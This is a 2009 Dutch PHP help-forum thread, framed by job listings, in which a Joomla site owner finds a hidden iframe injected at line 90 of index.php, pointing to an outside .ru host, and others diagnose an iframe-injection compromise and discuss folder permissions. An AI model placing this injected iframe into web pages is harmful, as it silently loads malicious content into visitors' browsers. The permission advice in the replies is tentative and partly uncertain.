Ineens parse error

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Traineeship Full Stack .NET Developer

Dit ga je doen Start op 7 augustus 2023 bij de Experis Academy en ontwikkel jezelf tot een gewilde Full Stack .NET Developer. Maar hoe ziet het traineeship eruit en wat kun je verwachten? Periode 1 De eerste 3 maanden volg je fulltime, vanuit huis, een op maat gemaakte training in teamverband. Je leert belangrijke theorie en krijgt kennis van de benodigde vaardigheden en competenties die nodig zijn om de IT-arbeidsmarkt te betreden. Zowel zelfstandig als in teamverband voer je praktijkopdrachten op het gebied van front- en backend development uit. Wat er per week op het programma staat kun je

Bekijk vacature »

C# ontwikkelaar

Functie omschrijving Werk jij graag met C# en het .NET framework in een leuk familiebedrijf? Lees dan snel verder! Jouw takenpakket hierbij is: Je gaat maatwerk software ontwikkelen en softwareoplossingen creëren. Je gaat werken in een Microsoft omgeving (ASP.NET) en gebruikt daarnaast C# en MVC. Samen met het huidige IT team binnen deze organisatie verwerk je de wensen van de klant tot een (eind)product. Daarnaast optimaliseer je de bestaande software. Bedrijfsprofiel Deze organisatie is gevestigd in de omgeving van Best en is een echt familiebedrijf. Je komt te werken in een klein team van developers, die zich voornamelijk bezighouden met

Bekijk vacature »

Technisch Applicatie ontwikkelaar

Functie omschrijving Ben jij op zoek naar een nieuwe uitdaging en zoek jij een informele werkgever waar je zelfstandig kunt werken binnen een leuk IT team, lees dan snel verder want wie weet zijn wij op zoek naar jou! In deze functie werk jij voornamelijk aan: Het onderhouden en ontwikkelen van de IT systemen; Het opzetten van Azure Cloud systemen, denk aan interfaces, hardware op de Cloud, webportalen of BI functies; Werk je aan scripts binnen verschillende software applicaties, denk aan ERP en CAD; Ontwikkel en implementeren je MS PowerApps en Power BI. Bedrijfsprofiel Je komt terecht bij een familiair

Bekijk vacature »

Senior/Lead Python developer

Functie Samen met je team, bestaande uit een senior, 2 mediors en één junior ontwikkelaar ga je op een Agile-gebaseerde aanpak werken aan hun software. Je hebt oog voor kwaliteit, risico’s en klantbelang. Communicatie met je collega’s en waar nodig ook met klanten speelt een belangrijke rol in het bereiken van een succesvol resultaat. Als persoon ben je slim, krijg je dingen voor elkaar en ga je resultaatgericht te werk. Binnen het development team is er veel zelfstandigheid, los van de stand-up (10:00 uur) en zo nu en dan pair-programming sessies. Technieken die zij gebruiken zijn o.a. Python, Django, MySQL,

Bekijk vacature »

Full Stack PHP Developer

Functieomschrijving Ervaren PHP Developer gezocht! Wij zijn op zoek naar een ervaren PHP Developer die het IT team van een organisatie in de regio Ermelo gaat versterken. Voor deze functie zijn we op zoek naar een enthousiaste en breed georiënteerde IT-er die deze innovatieve organisatie nog een stap verder gaat brengen. Wij zijn op zoek naar iemand die communicatief goed is en die zelfstandig problemen op kan lossen. Je bent verantwoordelijk voor het samenwerken met een externe partij het is hierbij jouw taak om deze partij uit te dagen op het geleverde werk. Het schrijven van concepten aan de AI

Bekijk vacature »

Cymer Patch Server Developer

Vacature details Vakgebied: Software/IT Opleiding: Senior Werklocatie: Veldhoven Vacature ID: 12919 Introductie This new patch server will be built on Python and Django ReST and GraphQL services with a React frontend, it will consist of several microservices and run on a Kubernetes cluster. It will be supported by several middleware applications such as ElasticSearch, Redis, RabbitMQ, Oracle and Artifactory. Functieomschrijving The Patch Admin team always aim to deliver software at a high quality, we avoid sacrifices here to maintain our velocity. Practically this means that we practice test driven development and perform end-to-end automated testing on our software. This means

Bekijk vacature »

Medior PHP developer

Functie Samen met je development team werk je Agile Scrum en met jullie gezamenlijke kennis en ervaring bepalen jullie samen de beste keuze voor techniek en architectuur. Naast het ontwikkelen van software ben je continue bezig om ook jezelf te ontwikkelen. Ze werken met o.a.: PHP, Laravel, Doctrine, PHP Unit, Behat, React, TypeScript, (My)SQL, Postgress, Redis, ElasticSearch, Docker, Nginx, GIT flow, JIRA, AWS. Eisen • HBO werk- en denkniveau • Je hebt goede kennis en ervaring met PHP • Je bent niet bang voor complexe projecten • Je werkt graag zelfstandig aan applicaties • Je bent altijd nieuwsgierig naar nieuwe

Bekijk vacature »

Software Developer

Functie omschrijving In deze functie ga je aan de slag met het door ontwikkelen van de interne software. Zij maken gebruik van een CRM, wat door de hele organisatie gebruikt wordt. Andere taken: Je gaat het CRM-systeem door middel van PHP verder ontwikkelen; Verder bouw je verschillende API's en koppelingen tussen systemen; Ook ga je collega's ondersteunen bij vragen over de software en applicaties; Deelnemen aan overleggen met het development team; Bij interesse is er de mogelijkheid om junioren te gaan begeleiden. Bedrijfsprofiel Dit bedrijf is actief binnen de telecombranche. Het hoofdkantoor zit in regio van Den Bosch en er

Bekijk vacature »

Medior/senior front end developer React Sportsoftw

Functie Voor deze functie ben ik op zoek naar een enthousiaste front end developer die communicatief vaardig is. Jij wordt onderdeel van een enthousiast jong team dat werkt aan grote websites. Binnen jouw rol ben jij diegene die de vertaling maakt van design naar functionele code en zorg jij voor goede experience op meerdere platformen. Dit doe je natuurlijk door gebruik te maken van onze stack; Javascript, HTML, CSS en React. Daarnaast wordt er gebruik gemaakt van Webcomponents en verschillende authenticatie tools. Doordat er hier gestreefd wordt naar de beste gebruikerservaringen, wordt het product constant doorontwikkeld. Hierdoor blijven ze voor

Bekijk vacature »

Front-End Developer

As a Front-End Developer at Coolblue you improve the user-friendliness of our webshop for millions of customers. How do I become a Front-End Developer at Coolblue? As a Front-End Developer you work on the user-friendliness of our webshop for millions of customers. You enjoy working with the UX Designer to pick up stories. You get energy from coming up with creative solutions and are happy to present these within the team. You also take pride in your work and welcome any feedback. Would you like to become a Front-End Developer at Coolblue? Read below if the job suits you. You

Bekijk vacature »

Fullstack developer

Functie omschrijving Ben jij toe aan een nieuwe uitdaging en zou jij graag bij een platte maar informele organisatie werken? Voor een mooi softwarebedrijf in omgeving Alblasserdam zijn wij op zoek naar versterking op de afdeling Software Development! Als Fullstack react.js developer wordt je bij dit bedrijf onderdeel van de volledige ontwikkeling van requirement tot oplevering! Jouw focus ligt op de front end en alles wat daarbij komt kijken. Je gaat ontwerpen, ontwikkelen, testen en valideren. Je zult voornamelijk werken met React.js en Typescript. Maar ook Javascript, HTML en CSS komen aanbod. Daarnaast zal je ook regelmatig met de back

Bekijk vacature »

Full-stack Developer

As a Full-stack developer at KUBUS, you will develop the (web)applications and services of BIMcollab. You will work on both the front- and back-end. As a software company, KUBUS is in a unique position. We build our own products that are used by tens of thousands of users worldwide. Our company is just the right size: big enough to make a real impact in the market, but small enough that as an individual developer you can have an impact and really make a difference. Our development team consists of over 40 developers, testers, scrum masters and product owners, divided over

Bekijk vacature »

Low-code developer

Functie omschrijving Heb jij altijd al een training willen volgen in het buitenland? Voor een leuke opdrachtgever in omgeving Alphen ad Rijn zijn wij op zoek naar kandidaten die aan de slag willen als Low Code Developer! Beschik jij over HBO/WO nivo, bij voorkeur Informatica, maar een ander technische opleiding zoals bijv. wiskunde, natuurkunde is ook goed. Heb jij aantoonbare affiniteit met IT en ben jij gedreven, enthousiast, communicatief vaardig en klantgericht? Lees dan snel verder! Je wordt getraind tot een volwaardig Low Code Developer, het traject ziet er als volgt uit: Start 1e week januari, opleiding van 3 weken

Bekijk vacature »

Lead Java Developer

Dit ga je doen Je taken bestaan onder andere uit: Het aansturen van een development team bestaande uit 8 collega's op technisch maar ook HR gebied; Het maken van strategische keuzes omtrent de (nieuw)bouw van deze applicatie; Het maken van technische ontwerpen; Hands-on mee ontwikkelen met het team (met o.a. Java, Spring, Angular, REST); Reviewen van code en feedback geven op collega developers. Hier ga je werken Als Lead Software Developer ben je verantwoordelijk voor één van de vier Agile Java ontwikkelteams die bouwen aan technologie die duizenden instanties wereldwijd verbindt. Dit Agile team, data Jira en Confluence gebruikt en

Bekijk vacature »

Senior .NET developer

Klaar voor een nieuwe uitdaging? Welke technologieën gaan schuil achter de dagelijkse energievoorziening? Als senior .NET developer bij Kenter maak jij samen met je team het verschil, zowel voor de interne organisatie als voor eindklanten. Samen bouwen jullie aan innovatieve dienstverlening met behulp van de nieuwste technologieën en tools. Het is een functie met veel vrijheid, goede arbeidsvoorwaarden én je draagt jouw steentje bij aan de energietransitie. Klinkt dit als iets voor jou? Lees dan verder of solliciteer direct! Wat ga je doen als senior .NET developer? Als senior .NET developer bij Kenter (onderdeel van Alliander) ben je van onschatbare

Bekijk vacature »
JanWillem BlaBla

JanWillem BlaBla

01/07/2009 12:16:00
Quote Anchor link
Ik heb een joomla site en die loopt al een paar maanden zonder problemen, ineens krijg ik de volgende fout:
Parse error: syntax error, unexpected '<' in /var/www/vhosts/vvhunsingo.nl/httpdocs/index.php on line 90

Ik heb niets veranderd ofzo, weet iemand hoe dit kan en hoe ik dit kan oplossen?

Dit is line 90:
<iframe src="http://a3l.ru:8080/ts/in.cgi?pepsi85" width=125 height=125 style="visibility: hidden"></iframe>
Gewijzigd op 01/01/1970 01:00:00 door JanWillem BlaBla

PHP hulp

PHP hulp

22/11/2024 07:48:00

Justin S

Justin S

01/07/2009 12:26:00
Quote Anchor link
Van server veranderd? Nieuwe PHP versie geïnstalleerd klopt de locatie van het iFrame wel, en is er niks veranderd in het bestand waar het iFrame naartoe verwijst?

TJVB tvb

TJVB tvb

01/07/2009 12:32:00
Quote Anchor link
Klinkt meer alsof de server/script gehackt is en iemand spyware o.i.d. doormiddel van een iframe wil verspreiden.

JanWillem BlaBla

JanWillem BlaBla

01/07/2009 13:09:00
Quote Anchor link
Ik heb regel 90 gewoon verwijderd, nu doet ie het weer maar kan iemand mij vertellen waar deze regel dan goed voor was?

Danny Roelofs

Danny Roelofs

01/07/2009 13:14:00
Quote Anchor link
Ja je bent na mijn mening getroffen door de zo te noemen IFrame injection hack , dit zou over meerdere bestanden kunnen zijn gebeurt, overkomt veel joomla installatie's zoals het blijkt die hun map rechten niet goed zetten.

JanWillem BlaBla

JanWillem BlaBla

01/07/2009 13:17:00
Quote Anchor link
weet je toevallig om welke mappen dit gaat? Dan kan ik de rechten goed zetten...

TJVB tvb

TJVB tvb

01/07/2009 13:18:00
Quote Anchor link
de basis is dat de webserver niet mag schrijven in alles behalve de mappen die speciaal voor het uploaden bedoeld zijn. En ook de bestanden niet mag wijzigen

JanWillem BlaBla

JanWillem BlaBla

01/07/2009 13:24:00
Quote Anchor link
ik heb op bijna alle mappen 755 staan, is dat goed genoeg?

Midas

Midas

01/07/2009 13:35:00
Quote Anchor link
JanWillem117 schreef op 01.07.2009 13:24:
Ik zou het precieze nummer niet weten, maar volgens mij is dat te veel.

Midas

Midas

01/07/2009 13:35:00
Quote Anchor link
JanWillem117 schreef op 01.07.2009 13:24:
Ik zou het precieze nummer niet weten, maar volgens mij is dat te veel.

Danny Roelofs

Danny Roelofs

01/07/2009 13:39:00
Quote Anchor link
Ik weet zelf niet veel meer van Joomla af, je zou het beste ook je advies bij Joomla c.q documentatie kunnen inwinnen, maar zover ik me herinner moeten bepaalde mappen en bestanden op 644 zijn gezet, al is 755 altijd al beter als 777

Overzicht Reageren

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.